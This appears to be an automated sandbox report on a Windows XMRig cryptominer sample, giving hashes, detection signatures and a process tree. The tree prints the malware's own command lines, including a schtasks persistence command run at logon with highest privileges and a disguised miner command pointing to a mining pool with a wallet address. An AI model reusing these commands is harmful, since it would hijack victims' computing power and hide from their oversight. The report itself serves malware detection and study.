Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 13:05
Static task
static1
Behavioral task
behavioral1
Sample
ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe
Resource
win7-20240903-en
General
-
Target
ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe
-
Size
2.1MB
-
MD5
ef9e6a4bab77a1e5ed51669eabeba31d
-
SHA1
43b67b32d2fd462f0cb9277ed974d63a5575fc8c
-
SHA256
ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
-
SHA512
8d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99
-
SSDEEP
24576:XRVlL9DqdKIEs0D7Vx1YPgZqkwBKmXXJj52antf0RsLrGaaFssusSWcaurrYL0Yv:h/GJ66PgUKUZkgtzGGsrzcdorJKJS
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/3156-26-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-28-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-33-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-32-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-31-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-34-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-30-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-35-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-39-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-41-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3156-40-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
IOAshdohSha.exesihost64.exepid Process 3604 IOAshdohSha.exe 4384 sihost64.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid Process procid_target PID 4808 set thread context of 3156 4808 conhost.exe 102 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
conhost.execonhost.exepid Process 3552 conhost.exe 4808 conhost.exe 4808 conhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
conhost.execonhost.exenslookup.exedescription pid Process Token: SeDebugPrivilege 3552 conhost.exe Token: SeDebugPrivilege 4808 conhost.exe Token: SeLockMemoryPrivilege 3156 nslookup.exe Token: SeLockMemoryPrivilege 3156 nslookup.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.execonhost.execmd.execmd.exeIOAshdohSha.execonhost.exesihost64.exedescription pid Process procid_target PID 4196 wrote to memory of 3552 4196 ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe 84 PID 4196 wrote to memory of 3552 4196 ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe 84 PID 4196 wrote to memory of 3552 4196 ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe 84 PID 3552 wrote to memory of 3068 3552 conhost.exe 87 PID 3552 wrote to memory of 3068 3552 conhost.exe 87 PID 3068 wrote to memory of 3232 3068 cmd.exe 89 PID 3068 wrote to memory of 3232 3068 cmd.exe 89 PID 3552 wrote to memory of 2300 3552 conhost.exe 93 PID 3552 wrote to memory of 2300 3552 conhost.exe 93 PID 2300 wrote to memory of 3604 2300 cmd.exe 96 PID 2300 wrote to memory of 3604 2300 cmd.exe 96 PID 3604 wrote to memory of 4808 3604 IOAshdohSha.exe 100 PID 3604 wrote to memory of 4808 3604 IOAshdohSha.exe 100 PID 3604 wrote to memory of 4808 3604 IOAshdohSha.exe 100 PID 4808 wrote to memory of 4384 4808 conhost.exe 101 PID 4808 wrote to memory of 4384 4808 conhost.exe 101 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4808 wrote to memory of 3156 4808 conhost.exe 102 PID 4384 wrote to memory of 4272 4384 sihost64.exe 107 PID 4384 wrote to memory of 4272 4384 sihost64.exe 107 PID 4384 wrote to memory of 4272 4384 sihost64.exe 107 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3232
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\IOAshdohSha.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Users\Admin\IOAshdohSha.exeC:\Users\Admin\IOAshdohSha.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\IOAshdohSha.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:4272
-
-
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=1006⤵
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
31KB
MD56a7e9885a2d01df564b46f8f27258853
SHA12f57231a188226669ff74cf886a09572ed69025e
SHA2566ba3e42c8fa7dabe994e2793f369bac914ea2e4949174fc2a0efe4cbfebe8171
SHA51284b4b84066a48df6bd087679a75333c306c8f688679c508e171b14d5012711de3a781cea4d4c65debb694557dafd66dbc359516451f700179d5c6806710cdf17
-
Filesize
2.1MB
MD5ef9e6a4bab77a1e5ed51669eabeba31d
SHA143b67b32d2fd462f0cb9277ed974d63a5575fc8c
SHA256ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
SHA5128d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99